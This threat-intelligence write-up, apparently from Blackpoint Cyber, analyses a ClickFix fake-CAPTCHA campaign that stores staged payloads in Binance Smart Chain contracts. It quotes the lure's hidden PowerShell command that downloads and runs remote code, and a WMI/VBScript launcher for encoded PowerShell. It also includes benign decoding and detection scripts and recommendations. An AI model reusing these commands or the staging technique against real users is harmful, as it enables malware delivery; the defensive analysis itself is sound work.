Beyond the Click: Forensic Analysis of Etherhiding in ClickFix Campaign Infrastructure
The modern threat landscape consistently leverages new technologies within malicious campaigns and kill chains, and adopting them early gives threat actors an edge over their targets. The Blackpoint SOC continues to see blockchain, more specifically smart contracts on the Binance Smart Chain (BSC), used within ClickFix campaigns. The BSC is leveraged to stage the malicious payloads used in these ClickFix campaigns. The use of BSC smart contracts in this way is the technique known as Etherhiding.
Key Takeaways:
- Threat actors continue to adapt and utilize new and upcoming technology within their kill chains.
- Threat actors leverage compromised WordPress sites to host malicious JavaScript, which retrieves a second-stage payload from the BSC.
- BSC provides threat actors with the ability to run decentralized applications and smart contracts.
- Etherhiding abuses these smart contracts to host malicious code within the blockchain.
- Due to the permanent nature of the blockchain, once the contract is created, it cannot be taken down.
What is EtherHiding?
Binance is one of the largest cryptocurrency exchanges in the world. Binance Smart Chain (BSC) is Binance’s proprietary competitor to Ethereum, offering the ability to run decentralized apps and smart contracts. Think of a smart contract as a digital agreement, which executes specific actions once the correct conditions are met.
Etherhiding abuses BSC smart contracts to host malicious code within the blockchain. Due to the permanent nature of the blockchain, once the malicious code is pushed to the chain, it cannot be removed. Additionally, this technique allows a threat actor to update their entire campaign at once by pushing a single update to the contract being called.
Threat Actors Love WordPress (Almost as Much as Admins Love “admin123”)
The Blackpoint SOC recently responded to an incident in which two users fell for a Fake Captcha served by an ongoing ClickFix campaign. This activity was alerted on by Microsoft Defender for Endpoint (MDE), which detected ClickFix behavior originating from explorer.exe.

Image 1 -> Microsoft Defender for Endpoint alerts flagging this ClickFix activity
Investigation into these devices found that this specific Fake Captcha socially engineered users into running the below PowerShell command via the Windows Run Dialog Box.
powershell.exe UNKNOWN 8168 powershell.exe -w h (irm -useb 'hxxps[://]<malicious domain>/e2e8676e-b8e2-4565-a276-724f7a7a417d.t' ) | powershell; "" BotGuard: Answer the protector challenge. Ref: 643811424
This malicious PowerShell command does the following:
- Launches PowerShell in a hidden window using -w h
- Uses the alias irm -useb, shorthand for Invoke-RestMethod -UseBasicParsing
- Downloads the contents of the file hosted at the malicious domain
- Pipes the downloaded content into a second PowerShell instance
- This will execute the contents of whatever is hosted on this malicious domain
The above commands are associated with the first stage of this ClickFix campaign. This same activity flagged for a different host in this network within 10 minutes of this first alert. This is interesting because it indicates that these users are either receiving the link to this compromised site via email or are visiting a well-known site which led to their compromise.
Open-Source Intelligence (OSINT) found that the company’s WordPress site was compromised via this ClickFix campaign.

Image 2 – The Fake Captcha hosted on the customer’s compromised WordPress site
Further investigation into this compromised site found the IOCs tied to an ongoing ClickFix campaign. The HTML contained JavaScript which called a reCAPTCHA from gstatic. Gstatic is a Google domain that hosts static content, including JavaScript, so that clients receive cached resources when they visit a site.

Image 3 – HTML code calling reCaptcha from gstatic Domain
Further digging into the site found the injected ClickFix content tied to this Fake Captcha. The JavaScript associated with this campaign is heavily obfuscated; analysis found it was obfuscated using the free online JavaScript obfuscator Obfuscator[.]io.

Image 4 – Malicious ClickFix JavaScript injected into compromised WordPress site
This obfuscated JavaScript can be deobfuscated using obf-io[.]deobfuscate[.]io, which provides cleaner and more readable JavaScript.

Image 5 – Deobfuscating the JavaScript using obf-io[.]deobfuscate[.]io
Analysis of the deobfuscated ClickFix JavaScript found that it operates as a loader and does the following:
- Uses string scrambling, console tampering, and self-checks to hinder detection and triage
- Calls out to a Binance Smart Chain testnet node via a JSON-RPC request
- Inspects the User-Agent of the user visiting the compromised site
- Delivers a different payload depending on whether the visiting device is Windows or macOS based
- Returns and provides the correct payload based on the visiting operating system of the device
The main use case for this JavaScript is to load, decode, and serve the correct payload depending on the operating system of the affected device. There are two different Binance contract addresses associated with the loader, which serve a unique payload based on the victim’s OS.
Analyzing the smart contract itself, we can see it’s designed to act as a stealthy storage container for malicious data, specifically a chunk of encoded JavaScript that will later be executed on the victim’s machine. Unlike normal smart contracts that implement things like finance (DeFi), NFTs, or games, this contract is weaponized to quietly hold malware in its internal storage and allow anyone to fetch it without making a public transaction.
The key function in the contract is one that looks like this conceptually:

Image 6 – Conceptual framework of the main function
Internally, this function is designed to return a blob of data stored on-chain. This data is base64-encoded JavaScript, and when the loader script issues an eth_call to the contract, it retrieves the payload, decodes it, and immediately executes it. Because eth_call is a read-only operation, it leaves no trace on-chain, making it ideal for stealthy malware delivery.
Beyond that, the smart contract includes standard “ownable” features. This means there’s an owner (the address that deployed it), and only the owner can change the contents of the payload. It includes functions to:
- Get the current owner address
- Transfer ownership to another address
- Update or overwrite the payload in storage
It also includes safeguards to prevent unauthorized modification. Any attempt to change contract state by an address other than the owner results in an error: “This can only be called by the contract owner!”
Reviewing the transaction history for the BSC, we identified the contract was created on December 8th, 2024, from the attacker-controlled address. This address was generated earlier that same day and funded with approximately $195.72 USD worth of BNB.

Image 7 – Smart contract creation
This initial funding allowed the attacker to deploy and later update the smart contract. Although eth_call itself is free, deploying or modifying the contract requires gas fees, which are paid using BNB and depend on transaction complexity.
Each contract update consists of a hex-encoded base64 string, which when decoded reveals the updated second-stage JavaScript. Analysis of multiple contract states shows that these updates frequently change the hardcoded third-stage domain, allowing the attacker to quickly shift infrastructure by simply pushing a new payload to the blockchain.
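The decoding path described above, hex-encoded ABI string from an eth_call result, to base64, to the second-stage JavaScript, with the hardcoded staging domain pulled out at the end, as an added worked example rather than code from the campaign or from Blackpoint. The second-stage script, the RPC response and the domain are constructed stand-ins; the ABI string layout (offset word, length word, padded bytes) is the standard one.

```python
import base64
import json
import re
from typing import Optional

# Constructed stand-in for the second-stage script (not the campaign's real code);
# the detail an analyst needs out of it is the hardcoded staging domain in "dmn".
SAMPLE_STAGE2_JS = 'var dmn="staging.example.invalid";document.body.innerHTML="";'


def abi_encode_string(s: str) -> str:
    """ABI-encode one dynamic `string` return value as 0x-prefixed hex."""
    data = s.encode()
    offset = (32).to_bytes(32, "big")             # where the string starts
    length = len(data).to_bytes(32, "big")        # byte length of the string
    padded = data + b"\x00" * (-len(data) % 32)   # right-pad to a 32-byte word
    return "0x" + (offset + length + padded).hex()


def build_sample_rpc_response() -> str:
    """Constructed eth_call reply: the contract returns base64 text, ABI-encoded."""
    b64 = base64.b64encode(SAMPLE_STAGE2_JS.encode()).decode()
    return json.dumps({"jsonrpc": "2.0", "id": 1, "result": abi_encode_string(b64)})


def abi_decode_string(result_hex: str) -> str:
    """Read the offset word, then the length word, then slice out the bytes."""
    raw = bytes.fromhex(result_hex[2:] if result_hex.startswith("0x") else result_hex)
    offset = int.from_bytes(raw[:32], "big")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    return raw[offset + 32:offset + 32 + length].decode()


def decode_contract_payload(rpc_response: str) -> str:
    """hex (ABI string) -> base64 text -> second-stage JavaScript."""
    result = json.loads(rpc_response)["result"]
    return base64.b64decode(abi_decode_string(result)).decode()


def extract_staging_domain(stage2_js: str) -> Optional[str]:
    """Pull the third-stage domain out of the `dmn` variable, if present."""
    m = re.search(r'\bdmn\s*=\s*["\']([^"\']+)["\']', stage2_js)
    return m.group(1) if m else None


if __name__ == "__main__":
    js = decode_contract_payload(build_sample_rpc_response())
    print("staging domain:", extract_staging_domain(js))
```

Run against a real eth_call result, the same decode_contract_payload() step applied to each historical contract state gives the domain history the paragraph describes.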

Image 8 – Smart contract update event

Image 9 – The base64 encoded contents of the update

Image 10 – Decoded contents of the contract payload
Further analysis of the decoded contents of the code served by the smart contract found that it is obfuscated again using obfuscator[.]io. This code can once again be quickly deobfuscated, which provides further insight into the functionality of the payload.

Image 11 – Deobfuscating the malicious payload using obf-io[.]deobfuscate[.]io
The JavaScript returned from the contract builds the fake CAPTCHA overlay, handles visual deception with HTML/CSS, and copies a malicious mshta-based PowerShell command to the victim’s clipboard.
To track user interaction with the phishing site, the JavaScript establishes a unique identifier per visitor. This is done using a UUIDv4 generator embedded in the loader script. On page load, the script calls generateUUIDv4() to create a new universally unique identifier (UUID). This identifier is saved as a cookie named cjs_id in the victim’s browser and persists for two days.
Once the identifier is created and stored, the loader begins polling the smart contract via the isGoalReached() function. This function performs a JSON-RPC eth_call to the contract on the Binance Smart Chain Testnet, passing in the UUID as part of the encoded call data. The contract stores a list of UUIDs representing victims who have executed the malicious payload. If the UUID is found in the contract’s response, the loader script interprets this as a successful execution and removes the fake CAPTCHA overlay from the screen.

Image 12 – Malicious mshta command within payload
This mshta-based PowerShell command executes a Bash script (.sh file) from a Russian domain. This can be seen by correlating the “dmn” variable, which points to this malicious staging domain.


Image 13 + 14 – Correlating “dmn” variable to malicious staging domain
Retrieving this supposed Bash script file showed heavily obfuscated content. Further investigation found that it is in fact an ISO file with malicious JavaScript smuggled inside.


Image 15 & 16 – Malicious bash script is an ISO file with smuggled JavaScript
The JavaScript can be parsed out by grepping for the <script> tags within the HTML, which provides us with the payload, executed by mshta within this ClickFix campaign.

Image 17 – Smuggled JavaScript within this hosted ‘ISO’ file
Analysis of this smuggled JavaScript found that its main functionality is to act as a loader. This loader executes a fileless payload, which uses VBScript to launch PowerShell via Windows Management Instrumentation (WMI):
window.execScript(
    'GetObject("winmgmts:").Get("Win32_Process").Create "powershell.exe -w h -nop -ep un -E <base64 payload>"',
    'VBScript'
);
Recommendations
- Restrict usage of the Windows Run Dialog Box via a Group Policy Object (GPO).
- Monitor and audit changes on publicly exposed sites
- Patch and ensure all running WordPress sites are patched and not vulnerable
- Restrict PowerShell usage
- Monitor and flag any network callouts to Binance Smart Chain / Web 3.0 addresses
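One way to act on the last recommendation, and on the polling behavior described earlier (isGoalReached() issuing eth_call after eth_call with a changing UUID argument): parse proxy logs for JSON-RPC eth_call bodies and group them by client, node host, contract and 4-byte function selector. This is an added example, not Blackpoint tooling; the log format, node hostname, contract address and call data are constructed placeholders.

```python
import json
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed proxy log: client, method, host, path, body. The node host,
# contract address and call data are placeholders, not values from the incident.
SAMPLE_PROXY_LOG = """\
10.0.0.21 POST bsc-testnet-node.example.invalid / {"jsonrpc":"2.0","id":1,"method":"eth_call","params":[{"to":"0xCONTRACT_PLACEHOLDER","data":"0xa1b2c3d4000000000000000000000000002c"},"latest"]}
10.0.0.21 POST bsc-testnet-node.example.invalid / {"jsonrpc":"2.0","id":2,"method":"eth_call","params":[{"to":"0xCONTRACT_PLACEHOLDER","data":"0xa1b2c3d4000000000000000000000000007f"},"latest"]}
10.0.0.22 GET www.example.invalid /index.html -
10.0.0.23 POST api.example.invalid /v1/status {"status":"ok"}
"""
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (.*)$")


def parse_eth_calls(log_text: str) -> List[dict]:
    """Keep only POST bodies that are JSON-RPC eth_call requests."""
    calls = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group(2) != "POST":
            continue
        client, _method, host, _path, body = m.groups()
        try:
            rpc = json.loads(body)
        except json.JSONDecodeError:
            continue
        if isinstance(rpc, dict) and rpc.get("method") == "eth_call":
            call = (rpc.get("params") or [{}])[0]
            calls.append({"client": client, "host": host,
                          "to": call.get("to"), "data": call.get("data", "")})
    return calls


def summarize_polling(calls: List[dict]) -> Dict[Tuple[str, str, str, str], Tuple[int, int]]:
    """Group by (client, node host, contract, 4-byte selector) and return
    (call count, distinct call-data count): one selector hit repeatedly with
    changing arguments matches the UUID check-in loop, and any eth_call from
    a workstation is itself worth an alert."""
    groups: Dict[Tuple[str, str, str, str], List[str]] = defaultdict(list)
    for c in calls:
        groups[(c["client"], c["host"], c["to"], c["data"][:10])].append(c["data"])
    return {key: (len(v), len(set(v))) for key, v in groups.items()}


if __name__ == "__main__":
    for key, (n, distinct) in summarize_polling(parse_eth_calls(SAMPLE_PROXY_LOG)).items():
        print(key, f"calls={n} distinct_args={distinct}")
```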
By Nevan Beal & Sam Decker
Date published: May 27, 2025
Author: Blackpoint Cyber